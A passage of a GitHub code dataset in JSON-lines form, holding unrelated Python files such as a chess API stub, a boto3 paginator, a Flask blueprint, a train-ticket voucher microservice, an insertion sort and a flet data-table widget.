pass\n\n\nclass AiAgents(APIView):\n permission_classes = (AllowAny,)\n\n def get(self, request, username):\n \"\"\"\n Return a list of agents that a player can play against\n \"\"\"\n resp = ['Not Implemented']\n return Response(resp)\n","repo_name":"CheyneWilson/chess","sub_path":"chess/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8218424824","text":"import boto3,pprint\n\nsession = boto3.session.Session(profile_name=\"ankit\")\niam_res = session.resource(\"ec2\")\niam_cli = session.client(\"ec2\")\n\npaginator= iam_cli.get_paginator(\"describe_instances\")\n\nfor each in paginator.paginate():\n print(each)","repo_name":"Ankit0506/AWS","sub_path":"Paginators.py","file_name":"Paginators.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22314253479","text":"import pdb\nimport difflib as diff\n\nclass SortFile(object):\n \n \"\"\" This class opens a file and sorts all the items in that file. \"\"\"\n \n def __init__(self,file_name):\n self._file_name = file_name\n \n def read_file(self):\n self._file_handle = open(self._file_name,'r')\n text = self._file_handle.read()\n return text\n\n def clean_file(self,text):\n import string\n return text.translate(string.maketrans(\"\",\"\"), string.punctuation)\n \n def sort_file(self,text):\n doc =[s for s in text.split(\" \")]\n doc.sort()\n return doc\n\n\nclass LinearSearch(SortFile):\n \"\"\"This class searches within the sorted words and prints out the three closest words to the inserted word \"\"\"\n\n def __init__(self,word,file_name):\n self.__search_word = word\n self.__selected_list = []\n self.__all_words = {}\n self._file_name = file_name\n \n \"\"\" Initialize the contructor of the inherited class \"\"\"\n SortFile.__init__(self,self._file_name)\n\n\n \"\"\" Define a search method\"\"\"\n def search(self):\n _text = self.read_file()\n _text = self.clean_file(_text)\n _text = self.sort_file(_text)\n SEARCH = True\n N = 20 # Number of selected list\n n = N\n r = 1 # For exact matches\n cutoff = 0.0\n while (SEARCH == True):\n templist = diff.get_close_matches(self.__search_word,_text,n,r) # this method returns n words of less depending on the number of matches\n self.__selected_list.extend(list(set(templist))) # this line adds only a unique list \\ to the list of selected words. Basically, only one word that exactly matches the string would be added to the list in the first loop\n if len(self.__selected_list) > N-1 :\n SEARCH == False\n return self.__selected_list\n else:\n\n # Delete the selected words from the list of words available\n for selected_words in self.__selected_list:\n if selected_words in _text:\n _text.remove(selected_words)\n # Clean up the list and make room for closer words \n self.__selected_list = list(set(self.__selected_list))\n n = N - len(self.__selected_list)\n if r > cutoff + 0.1: # Ensure r does not go below 0.0\n r -= 0.1\n else:\n return self.__selected_list\n \n\nclass CalculateTime(object):\n \"\"\" This file calculates the time taken for each of the other two classes to run \"\"\"\n from time import time\n pass\n\n\n\ndef main():\n newText = LinearSearch(\"inter\",\"text\")\n result = newText.search()\n print(result)\n\n\nif __name__ == \"__main__\":\n main() \n\n \n\n","repo_name":"ojaribido42/python_oop","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40242939281","text":"# Source: http://stackoverflow.com/a/22006429/2842452, http://stackoverflow.com/a/38656830/2842452\nimport sys\nfrom cx_Freeze import setup, Executable\nimport os\n\n\nos.environ['TCL_LIBRARY'] = r\"D:\\Program Files\\Python35\\tcl\\tcl8.6\"\nos.environ['TK_LIBRARY'] = r\"D:\\Program Files\\Python35\\tcl\\tk8.6\"\nincludes = [\"tkinter\"]\ninclude_files = [r\"D:\\Program Files\\Python35\\DLLs\\tcl86t.dll\", \\\n r\"D:\\Program Files\\Python35\\DLLs\\tk86t.dll\"]\n\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup(\n name = \"Categories Backup Tool\",\n version = \"1.0\",\n description = \"Tool used to backup or export Steam Categories\",\n options = {\"build_exe\": {\"includes\": includes, \"include_files\": include_files}},\n executables = [Executable(\"GUI.py\",targetName=\"CategoriesBackupTool.exe\", base = base)])\n\n\n\n","repo_name":"DanielZa2/CategoriesBackupTool","sub_path":"Release/Tools/cx_Freeze/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"17071252382","text":"import traceback\nimport logging\nlogger = logging.getLogger(\"vaex.events\")\n\n\nclass Signal(object):\n def __init__(self, name=None):\n \"\"\"\n\n :type name: str\n :return:\n \"\"\"\n self.name = name or repr(self)\n self.callbacks = []\n self.extra_args = {}\n\n def connect(self, callback, prepend=False, *args, **kwargs):\n # logger.debug(\"(%s) connected %s\", self.name, callback)\n # insert first, otherwise emit may get a keyerror in multithreaded cases\n self.extra_args[callback] = (args, kwargs)\n if prepend:\n self.callbacks.insert(0, callback)\n else:\n self.callbacks.append(callback)\n return callback\n\n def emit(self, *args, **kwargs):\n results = []\n for callback in list(self.callbacks): # copy it because handlers van add or remove items\n extra_args, extra_kwargs = self.extra_args[callback]\n final_args = args + extra_args\n final_kwargs = {}\n final_kwargs.update(extra_kwargs)\n final_kwargs.update(kwargs)\n try:\n # logger.debug(\"(%s) calling %r with arguments %r and kwargs %r\", self.name, callback, final_args, final_kwargs)\n value = callback(*final_args, **final_kwargs)\n results.append(value)\n except Exception:\n logger.exception(\"error in handling callback %r with arguments %r and kwargs %r\", callback, final_args, final_kwargs)\n raise\n # tb = traceback.format_exc()\n # raise Exception(\"error while calling callback: %r with arguments %r and kwargs %r\" % (callback, final_args, final_kwargs), tb)\n return results\n\n def disconnect(self, callback):\n self.callbacks.remove(callback)\n del self.extra_args[callback]\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-core/vaex/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"42049441167","text":"import os\nfrom subprocess import call\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io import wavfile\nfrom math import ceil\nfrom pathlib import Path\n\n'''\nmake sure everything works for files in different folders, etc\n\n'''\n\nFCPXML_TEMPLATE = '''\n\n\n \n \n \n \n \n \n \n \n \n \n{asset_clips}\n \n \n \n \n \n'''\nASSET_CLIP_TEMPLATE = '''\n \n \n'''\n\nMARKERS = {\n 'Hotkey 1 was pressed':1,\n 'Hotkey 2 was pressed':2,\n 'Hotkey 3 was pressed':3,\n 'Hotkey 4 was pressed':4,\n 'Hotkey 5 was pressed':5\n }\n\n# returns an integer equal to the number of frames in a video\n# takes a string in the form HH:MM:SS\ndef to_frames(str_hhmmss, fps=60):\n\n time_list = str_hhmmss.split(':')\n\n h = int(time_list[0])\n m = int(time_list[1])\n s = int(time_list[2])\n\n return (h*3600+m*60+s)*fps\n\n# makes a fcpxml file at output path\n# takes a string video_path and output_path which will point to relavant file names, will be converted to path objects\n# takes a clip list, usually generated by get_markers\ndef make_fcpxml(video_path, output_path, clip_list, fps=60, path=''):\n\n video_name = Path(video_path)\n output_name = Path(output_path)\n\n if not video_name.exists():\n print(\"File does not extist\")\n\n else:\n\n clips = ''\n video_duration = 0\n\n for clip in clip_list:\n clips += ASSET_CLIP_TEMPLATE.format(file_name=video_name.name, offset=str(video_duration), start=str(clip['start_frame']), duration=str(clip['total_frames']))\n video_duration += clip['total_frames']\n\n with output_name.open('w') as file:\n file.write(FCPXML_TEMPLATE.format(\n file_name=video_name.name, \n file_path=video_name.as_posix().replace(' ','%20'),\n asset_clips=clips\n )) # formatting the template with specific paramaters\n\n\n# \ndef get_markers(video_path, logs_path, fps=60):\n\n video_name = Path(video_path)\n logs_name = Path(logs_path)\n\n if not video_name.exists():\n print(\"video does not extist\")\n\n elif not logs_name.exists():\n print(\"logs does not extist\")\n\n # this code is farily messy and overcomplicated, possibly rewrite at some point if you feel like it\n\n else:\n\n source_name = str(video_name.name)\n print(source_name)\n\n # reads the log file and saves the relevant logs in a list\n with logs_name.open() as all_logs:\n p_vod_dir = source_name.split(' ')\n # getting the time code formating correct\n start_text = p_vod_dir[0] + ' ' + p_vod_dir[1].replace('-',':')[0:-4]\n print(start_text)\n\n all_logs_read = all_logs.read()\n\n if not start_text in all_logs_read:\n print(\"no recording in logs\")\n\n o_logs = all_logs_read.split('EVENT:START RECORDING @ ' + start_text)[1].split('EVENT:STOP RECORDING')[0].split('\\n\\n')[1:-1]\n\n # creates a dict of values corresponding to MARKERS and their corresponding times in the format H:MM:SS\n logs = []\n for log in o_logs:\n if 'HOTKEY' in log:\n marker = log.split(' @ ')[0].split('HOTKEY:')[1]\n try:\n logs.append({\n 'marker':MARKERS[marker],\n 'frame':to_frames(log.split('\\n')[1].split(' Record Time Marker')[0], fps=fps)\n })\n except:\n print('NO MARKER EQUALING '+marker)\n # more can be added here for scene changes or other things\n return logs\n\ndef getMaxVolume(s):\n maxv = float(np.max(s))\n minv = float(np.min(s))\n return max(maxv,-minv)\n\ndef getWav(video_path, fps=60):\n\n video_name = Path(video_path)\n\n if not video_name.exists():\n print(\"video does not extist\")\n\n else:\n # maybe edit to use a temp folder\n call('ffmpeg -i \"{}\" temp.wav'.format(video_path.replace(' ',' ')), shell=True)\n samplerate, data = wavfile.read('temp.wav')\n os.remove('temp.wav')\n return samplerate, data\n\nif __name__ == '__main__':\n\n # TO MAKE SURE EVERYTHING WORKS,\n # INSTEAD OF DOING THE AUDIOTHRESHOLD STUFF, JUST DO A FEW SECONDS BEFORE OR AFTER OR BOTH\n\n RECORDING = 'X:\\\\vods\\\\2022-02-19 17-31-27.mp4'\n LOGS = 'C:\\\\Users\\\\ethan\\\\Documents\\\\infowriter\\\\logs.txt'\n fps = 60\n audioThreshold = 0.1 # 0= audioThreshold:\n lowerFrameBound -= 1\n\n # finding upper bound\n upperFrameBound = m['frame'] # upper bound starts as the hotkey was pressed\n while frameVolumes[upperFrameBound]/maxVolume >= audioThreshold:\n upperFrameBound += 1\n\n clips.append({'total_frames':upperFrameBound-lowerFrameBound,'start_frame':lowerFrameBound})\n\n make_fcpxml(RECORDING, 'test.fcpxml', clips)\n\n\n","repo_name":"ethanbaker3525/autohighlighter","sub_path":"autohighlighter.py","file_name":"autohighlighter.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11686122552","text":"from flask import Blueprint, render_template, url_for, request\nfrom cascad.models.datamodel import AgentTypeModel, ComputeExperimentModel, ComputeExperimentTypeModel, AgentModel, GeneResultModel, ExperimentResultModel, ComponentTypeModel\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Bar, Scatter\n# from jinja2 import Markup\nfrom cascad.experiment.token_sender import ERC20TokenWorld\nfrom cascad.experiment.MBM.exp import GA as MBMExperiment\nfrom collections import defaultdict\nfrom flask_login import login_required\n\nhome_bp = Blueprint('home_bp', __name__,\n template_folder='templates', static_folder='static')\n\n\ndef token_discribute(max_step, world_id) -> Scatter:\n # agent_models = AgentModel.objects(step=max_step, world_id=world_id)\n generesult_models = ExperimentResultModel.objects(experiment_id=world_id)\n result = [\n (agent_model.day, agent_model.result[0]) for agent_model in generesult_models\n ]\n\n c = (\n Scatter()\n .add_xaxis([x[0] for x in result])\n .add_yaxis(\"Loss\", [x[1] for x in result])\n .set_global_opts(title_opts=opts.TitleOpts(title=\"Avg Loss Over Time\"))\n )\n return c\n\n\n# if not logged in then jump to login page\n@home_bp.route('/', methods=['GET', 'POST'])\n@login_required\ndef index():\n return render_template('index.html')\n\n\n@home_bp.route(\"/compute_experiment\", methods=['GET', 'POST'])\n@home_bp.route(\"/compute_experiment/\", methods=['GET', 'POST'])\n@login_required\ndef compute(page=0):\n page = int(page)\n if page == 0:\n experiments = ComputeExperimentModel.objects.order_by(\n '-creation_date').limit(5)\n else:\n experiments = ComputeExperimentModel.objects.order_by(\n '-creation_date').skip(page * 5).limit(5)\n return render_template('compute_experiment.html', experiments=experiments, page=page)\n\n\n@home_bp.route(\"/agents\", methods=['GET', 'POST'])\n@home_bp.route(\"/agents/\", methods=['GET', 'POST'])\n@login_required\ndef agent(agent_name=None):\n # if request.method == 'POST':\n # agent_type = request.form['agent_type']\n\n # else:\n if not agent_name:\n agents = AgentTypeModel.objects.all()\n return render_template('agent.html', agents=agents)\n else:\n agent = AgentTypeModel.objects(agent_name=agent_name).first()\n return render_template('agent_detail.html', agent=agent)\n\n\n@home_bp.route(\"/components\", methods=['GET', 'POST'])\n@home_bp.route(\"/components/\", methods=['GET', 'POST'])\n@login_required\ndef component(component_name=None):\n # if request.method == 'POST':\n # agent_type = request.form['agent_type']\n\n # else:\n if not component_name:\n components = ComponentTypeModel.objects.all()\n return render_template('components.html', components=components)\n else:\n component = ComponentTypeModel.objects(\n component_name=component_name).first()\n return render_template('component_detail.html', component=component)\n\n\n@home_bp.route(\"/examples\", methods=['GET', 'POST'])\n@login_required\ndef use_cases():\n return render_template('app.html')\n\n@home_bp.route(\"/colony\", methods=['GET', 'POST'])\n@login_required\ndef colony():\n iframe = 'https://colony.denovel.cn'\n return render_template('colony.html', iframe=iframe)\n\n@home_bp.route(\"/config_experiment\", methods=[\"GET\", \"POST\"])\n@home_bp.route(\"/config_experiment/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef config_experiment(step=0):\n step = int(step)\n if request.method == 'POST':\n experiment_type = request.form['experiment_type']\n if step == 1:\n agent_types = AgentTypeModel.objects(\n corresponding_experiment=experiment_type)\n return render_template(\n 'config_1.html',\n experiment_type=experiment_type,\n agent_types=agent_types\n )\n elif step == 2:\n selected_agents = request.form.getlist('agent_types')\n experiment_type = request.form['experiment_type']\n experiment_params = ComputeExperimentTypeModel.objects.get(\n experiment_type=experiment_type).experiment_params\n agent_types = AgentTypeModel.objects.all()\n selected_agent_types = zip(agent_types, selected_agents)\n\n return render_template(\n 'config_2.html',\n experiment_type=experiment_type,\n experiment_params=experiment_params,\n agent_types=agent_types,\n selected_agents=selected_agents,\n selected_agent_types=selected_agent_types\n )\n\n elif step == 3:\n selected_agents = request.form.getlist('agent_types')\n experiment_type = request.form['experiment_type']\n experiment_params = ComputeExperimentTypeModel.objects.get(\n experiment_type=experiment_type).experiment_params\n agent_types = AgentTypeModel.objects.all()\n selected_agent_types = zip(agent_types, selected_agents)\n params_result = {\n param: request.form[param] for param in experiment_params\n }\n if experiment_type == '_erc20_token':\n\n erc20_token_world = ERC20TokenWorld(\n float(params_result['AgentRadio']),\n int(params_result['AgentNumber']),\n int(params_result['IterNumbers']),\n )\n world_id = erc20_token_world.unique_id\n max_step = int(params_result['IterNumbers']) - 1\n erc20_token_world.run()\n elif experiment_type == '_mbm_experiment':\n experiment = MBMExperiment(popsize=int(\n params_result['popsize']), ngen=int(params_result['ngen']))\n # while experiment.running:\n # experiment.step()\n experiment.start()\n world_id = experiment.unique_id\n max_step = experiment.ngen\n elif experiment_type == '_pargov_experiment':\n pass\n else:\n pass\n return render_template(\n 'config_3.html',\n experiment_type=experiment_type,\n experiment_params=experiment_params,\n agent_types=agent_types,\n selected_agents=selected_agents,\n selected_agent_types=selected_agent_types,\n params_result=params_result,\n world_id=world_id,\n max_step=max_step\n )\n\n else:\n if step == 0:\n experiment_types = ComputeExperimentTypeModel.objects.all()\n return render_template('config_0.html', experiment_types=experiment_types)\n\n\n@home_bp.route(\"/tokens//\", methods=[\"GET\", \"POST\"])\ndef token_data(max_step, world_id):\n c = token_discribute(max_step, world_id)\n return c.dump_options_with_quotes()\n\n# @home_bp.route(\"/barChart\")\n# def get_bar_chart():\n# c = bar_base()\n# return c.dump_options_with_quotes()\n\n\n@home_bp.route(\"/bar\")\ndef get_bar_index():\n return render_template(\"bart.html\")\n\n\n@home_bp.route(\"/view_result/\")\ndef view_result(experiment_id):\n pass\n","repo_name":"casCAD-DAO/casCAD","sub_path":"cascad/server/api/routes/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":7306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40591205613","text":"from math import sqrt\n\ndef main():\n C=50\n H=30\n usr = input(\"Enter the nubers: \")\n list = usr.split(\",\")\n for i in list:\n D = int(i)\n intermediateValue = ((2*C*D)/H) \n print(int(sqrt(intermediateValue)),end=\",\")\n print() \n\n\nif __name__ == '__main__':\n main()","repo_name":"hasuq33/My_Python_Program","sub_path":"Practical_Program/Program6.py","file_name":"Program6.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3719093100","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request\nimport re\nfrom wallpaper.items import WallpaperItem\n\nnum = 0\n\nclass Jj20Spider(scrapy.Spider):\n name = 'jj20'\n allowed_domains = ['desk.zol.com.cn']\n start_urls = ['http://desk.zol.com.cn/dongman/2.html']\n\n def parse(self, response):\n Soup = BeautifulSoup(response.text, \"lxml\")\n if 'dongman' in response.url:\n for ul in Soup.find_all('ul' ,class_='pic-list2'):\n for li in ul.find_all('li'):\n url = li.a['href']\n yield Request('http://desk.zol.com.cn%s'%url)\n else:\n # 判断是解析下一个页面 还是 拿图片\n lenNum = len(response.xpath('//*[@id=\"showImg\"]/li[1]/@class').extract()[0].strip().split(' '))\n if lenNum == 2:\n for li in response.xpath('//*[@id=\"showImg\"]/li'):\n url1 = li.xpath('./a/@href').extract()[0]\n yield Request('http://desk.zol.com.cn/%s' %url1)\n else:\n url2 = ''\n # 获取图片地址\n imgUrl1 = response.xpath('//*[@id=\"2560x1600\"]/@href')\n imgUrl2 = response.xpath('//*[@id=\"1920x1200\"]/@href')\n imgUrl3 = response.xpath('//*[@id=\"1920x1080\"]/@href')\n\n if imgUrl1:\n url2 = imgUrl1.extract()[0]\n elif imgUrl2:\n url2 = imgUrl2.extract()[0]\n elif imgUrl3:\n url2 = imgUrl3.extract()[0]\n yield Request('http://desk.zol.com.cn%s'%url2, dont_filter=True, callback=self.getImgUrl)\n\n\n def getImgUrl(self, response):\n print(response.xpath('//img/@src').extract()[0])\n global num\n num += 1\n urlImg = response.xpath('//img/@src').extract()[0]\n if urlImg:\n item = WallpaperItem()\n item['name'] = num\n item['url'] = urlImg\n yield item","repo_name":"18355166248/wallpaper-python3-beautifulSoup","sub_path":"wallpaper/spiders/jj20.py","file_name":"jj20.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34379575871","text":"#coding:utf-8\nimport tornado.ioloop\nimport tornado.web\nimport json\nimport pymysql\nimport urllib\nimport urllib.request\n\nclass GetVoucherHandler(tornado.web.RequestHandler):\n\n def post(self, *args, **kwargs):\n #Analyze the data transferred: order id and model indicator (0 stands for ordinary, 1 stands for bullet trains and high-speed trains)\n data = json.loads(self.request.body)\n orderId = data[\"orderId\"]\n type = data[\"type\"]\n #Query for the existence of a corresponding credential based on the order id\n queryVoucher = self.fetchVoucherByOrderId(orderId)\n\n if(queryVoucher == None):\n #Request the order details based on the order id\n orderResult = self.queryOrderByIdAndType(orderId,type)\n order = orderResult['data']\n\n # jsonStr = json.dumps(orderResult)\n # self.write(jsonStr)\n\n #Insert vouchers table into a voucher\n config = {\n 'host':'ts-voucher-mysql',\n 'port':3306,\n 'user':'root',\n 'password':'root',\n 'db':'voucherservice'\n }\n conn = pymysql.connect(**config)\n cur = conn.cursor()\n #Insert statement\n sql = 'INSERT INTO voucher (order_id,travelDate,travelTime,contactName,trainNumber,seatClass,seatNumber,startStation,destStation,price)VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n try:\n cur.execute(sql,(order['id'],order['travelDate'],order['travelTime'],order['contactsName'],order['trainNumber'],order['seatClass'],order['seatNumber'],order['from'],order['to'],order['price']))\n conn.commit()\n finally:\n conn.close()\n #Query again to get the credential information just inserted\n self.write(self.fetchVoucherByOrderId(orderId))\n else:\n self.write(queryVoucher)\n\n def queryOrderByIdAndType(self,orderId,type):\n type = int(type)\n #ordinary train\n if(type == 0):\n url='http://ts-order-other-service:12032/api/v1/orderOtherService/orderOther/' + orderId\n else:\n url='http://ts-order-service:12031/api/v1/orderservice/order/'+orderId\n header_dict = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',\"Content-Type\": \"application/json\"}\n req = urllib.request.Request(url=url,headers=header_dict)# Generate the full data for the page request\n response = urllib.request.urlopen(req)# Send page request\n return json.loads(response.read())# Gets the page information returned by the server\n\n def fetchVoucherByOrderId(self,orderId):\n #Check the voucher for reimbursement for orderId from the voucher table\n config = {\n 'host':'ts-voucher-mysql',\n 'port':3306,\n 'user':'root',\n 'password':'root',\n 'db':'voucherservice'\n }\n conn = pymysql.connect(**config)\n cur = conn.cursor()\n #query statement\n sql = 'SELECT * FROM voucher where order_id = %s'\n try:\n cur.execute(sql,(orderId))\n voucher = cur.fetchone()\n conn.commit()\n #Build return data\n if(cur.rowcount < 1):\n return None\n else:\n voucherData = {}\n voucherData['voucher_id'] = voucher[0]\n voucherData['order_id'] = voucher[1]\n voucherData['travelDate'] = voucher[2]\n voucherData['contactName'] = voucher[4]\n voucherData['train_number'] = voucher[5]\n voucherData['seat_number'] = voucher[7]\n voucherData['start_station'] = voucher[8]\n voucherData['dest_station'] = voucher[9]\n voucherData['price'] = voucher[10]\n jsonStr = json.dumps(voucherData)\n print(jsonStr)\n return jsonStr\n finally:\n conn.close()\n\ndef make_app():\n return tornado.web.Application([\n (r\"/getVoucher\", GetVoucherHandler)\n ])\n\ndef initDatabase():\n config = {\n 'host':'ts-voucher-mysql',\n 'port':3306,\n 'user':'root',\n 'password':'root'\n }\n # Create a connection\n connect = pymysql.connect(**config)\n cur = connect.cursor()\n #create db\n sql = \"CREATE SCHEMA IF NOT EXISTS voucherservice;\"\n try:\n cur.execute(sql)\n connect.commit()\n finally:\n pass\n\n #Use the database\n sql = \"use voucherservice;\"\n try:\n cur.execute(sql)\n connect.commit()\n finally:\n pass\n\n #Create the table\n sql = \"\"\"\n CREATE TABLE if not exists voucherservice.voucher (\n voucher_id INT NOT NULL AUTO_INCREMENT,\n order_id VARCHAR(1024) NOT NULL,\n travelDate VARCHAR(1024) NOT NULL,\n travelTime VARCHAR(1024) NOT NULL,\n contactName VARCHAR(1024) NOT NULL,\n trainNumber VARCHAR(1024) NOT NULL,\n seatClass INT NOT NULL,\n seatNumber VARCHAR(1024) NOT NULL,\n startStation VARCHAR(1024) NOT NULL,\n destStation VARCHAR(1024) NOT NULL,\n price FLOAT NOT NULL,\n PRIMARY KEY (voucher_id));\"\"\"\n try:\n cur.execute(sql)\n connect.commit()\n finally:\n connect.close()\n\nif __name__ == \"__main__\":\n #Create database and tables\n initDatabase()\n app = make_app()\n app.listen(16101)\n tornado.ioloop.IOLoop.current().start()\n\n\n ","repo_name":"WHU-AISE/PBScaler","sub_path":"benchmarks/train-ticket/ts-voucher-service/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"37972477056","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"cats\"\nurlpatterns = [\n # ex: /cats/\n path(\"\", views.index, name=\"index\"),\n # ex: /cats/memes/\n path(\"memes/\", views.memes, name=\"memes\"),\n # ex: /cats/perse/\n path(\"perse/\", views.perse, name=\"perse\"),\n # ex: /cats/scotland/\n path(\"scotland/\", views.scotland, name=\"scotland\"),\n # ex: /cats/wild/\n path(\"wild/\", views.wild, name=\"wild\"),\n # ex: /cats/guests/\n path(\"guests/\", views.guests, name=\"guests\"),\n # ex: /cats/visitor/5/\n path(\"visitor//\", views.VisitorView.as_view(), name=\"visitor\"),\n]\n","repo_name":"yulachi/cats-fun-site","sub_path":"cats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18295799602","text":"import errno\nimport os\nimport sys\n\nsys.path.append(\n os.path.normpath(\n os.path.join(os.path.abspath(__file__), \"..\", \"..\", \"..\", \"common\")\n )\n)\nfrom env_indigo import * # noqa\n\nMIN_DIST = 0.1\neps = 0.01\n\nindigo = Indigo()\nindigo.setOption(\"treat-x-as-pseudoatom\", \"1\")\nindigo.setOption(\"smart-layout\", \"1\")\nindigo.setOption(\"molfile-saving-skip-date\", \"1\")\n\nif not os.path.exists(joinPathPy(\"out\", __file__)):\n try:\n os.makedirs(joinPathPy(\"out\", __file__))\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\nprint(\"**** Test Macrocycles ****\")\n\nsaver = indigo.writeFile(joinPathPy(\"out/macrocycles.sdf\", __file__))\n\nref_path = getRefFilepath(\"macrocycles.sdf\")\nref = indigo.iterateSDFile(ref_path)\nfor idx, item in enumerate(\n indigo.iterateSmilesFile(\n joinPathPy(\"molecules/macrocycles_test.smi\", __file__)\n )\n):\n try:\n print(\"Test Item #{} \".format(idx))\n mol = item.clone()\n mol.layout()\n res = moleculeLayoutDiff(\n indigo, mol, ref.at(idx).rawData(), ref_is_file=False\n )\n print(\" Result: {}\".format(res))\n mol.setProperty(\"test\", \"Item #{} \".format(idx))\n saver.sdfAppend(mol)\n except IndigoException as e:\n print(\"Exception for #%s: %s\" % (idx, getIndigoExceptionText(e)))\nsaver.close()\n","repo_name":"epam/Indigo","sub_path":"api/tests/integration/tests/todo/macrocycles.py","file_name":"macrocycles.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"7259816359","text":"num_arr = [8, 4, 23, 42, 16, 15]\n\n\ndef insertion_sort(num_arr):\n for idx_current in range(len(num_arr)+1):\n # if idx in num_arr\n temp = num_arr[idx_current]\n # print(f\"***temp's current index: {idx_current}\\n***\")\n # print(f\"***temp's current array value: {temp}\\n***\")\n # assign temp to idx\n\n next_idx = idx_current+1\n # print(f\"Next_idx index: {next_idx}\\n\")\n #assign at next index after initial iteration\n while next_idx >= 0 and temp < num_arr[next_idx]:\n # print (\"Next_idx index value: {next_idx}\")\n num_arr[next_idx - 1] = num_arr[next_idx]\n next_idx -= 1\n num_arr[next_idx+1] = temp\n # print(f\">> temp's current value: {temp}\\n ****\")\n\n return num_arr\n\n\n\n","repo_name":"MISalz/data-structures-and-algorithms-401","sub_path":"python/code_challenges/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74452371047","text":"from dataclasses import asdict, dataclass\nfrom typing import Any, Callable, Optional, Union\n\nimport flet as ft\nimport polars as pl\nfrom flet_core.gradients import Gradient\nfrom flet_core.types import (\n AnimationValue,\n BorderRadiusValue,\n OffsetValue,\n ResponsiveNumber,\n RotateValue,\n ScaleValue,\n)\n\n\n@dataclass\nclass DataTableConfig:\n width: ft.OptionalNumber = None\n height: ft.OptionalNumber = None\n left: ft.OptionalNumber = None\n top: ft.OptionalNumber = None\n right: ft.OptionalNumber = None\n bottom: ft.OptionalNumber = None\n expand: Union[None, bool, int] = None\n col: Optional[ResponsiveNumber] = None\n opacity: ft.OptionalNumber = None\n rotate: RotateValue = None\n scale: ScaleValue = None\n offset: OffsetValue = None\n aspect_ratio: ft.OptionalNumber = None\n animate_opacity: AnimationValue = None\n animate_size: AnimationValue = None\n animate_position: AnimationValue = None\n animate_rotation: AnimationValue = None\n animate_scale: AnimationValue = None\n animate_offset: AnimationValue = None\n on_animation_end = None\n tooltip: Optional[str] = None\n visible: Optional[bool] = None\n disabled: Optional[bool] = None\n data: Any = None\n border: Optional[ft.Border] = None\n border_radius: BorderRadiusValue = None\n horizontal_lines: Optional[ft.BorderSide] = None\n vertical_lines: Optional[ft.BorderSide] = None\n checkbox_horizontal_margin: ft.OptionalNumber = None\n column_spacing: ft.OptionalNumber = None\n data_row_color: Union[None, str, dict[ft.MaterialState, str]] = None\n data_row_height: ft.OptionalNumber = None\n data_text_style: Optional[ft.TextStyle] = None\n bgcolor: Optional[str] = None\n gradient: Optional[Gradient] = None\n divider_thickness: ft.OptionalNumber = None\n heading_row_color: Union[None, str, dict[ft.MaterialState, str]] = None\n heading_row_height: ft.OptionalNumber = None\n heading_text_style: Optional[ft.TextStyle] = None\n horizontal_margin: ft.OptionalNumber = None\n show_bottom_border: Optional[bool] = None\n show_checkbox_column: Optional[bool] = None\n sort_ascending: Optional[bool] = None\n sort_column_index: Optional[int] = None\n on_select_all = None\n\n\n@dataclass\nclass ModelDataTableConfig:\n ref: ft.Ref | None = None\n search: bool = False\n search_column_default_index: int = 0\n create_text_model: bool = False\n # row callbacks\n on_select_changed_row: Callable | None = None\n on_long_press_row: Callable | None = None\n # cell callbacks\n on_long_press_cell: Callable | None = None\n on_tap_cell: Callable | None = None\n on_double_tap_cell: Callable | None = None\n on_tap_cancel_cell: Callable | None = None\n on_tap_down_cell: Callable | None = None\n # column callbacks\n on_sort_column: Callable | None = None\n\n\nclass ModelDataTable(ft.UserControl):\n def __init__(\n self,\n *,\n model: pl.DataFrame,\n config: ModelDataTableConfig = ModelDataTableConfig(),\n dt_config: DataTableConfig = DataTableConfig(),\n ) -> None:\n super().__init__(ref=config.ref)\n self.data_table = ft.DataTable(**asdict(dt_config))\n self.config = config\n self.model = model\n if config.search:\n self._setup_search_bar()\n\n @property\n def model(self) -> pl.DataFrame:\n return self._original_model\n\n @model.setter\n def model(self, model: pl.DataFrame) -> None:\n 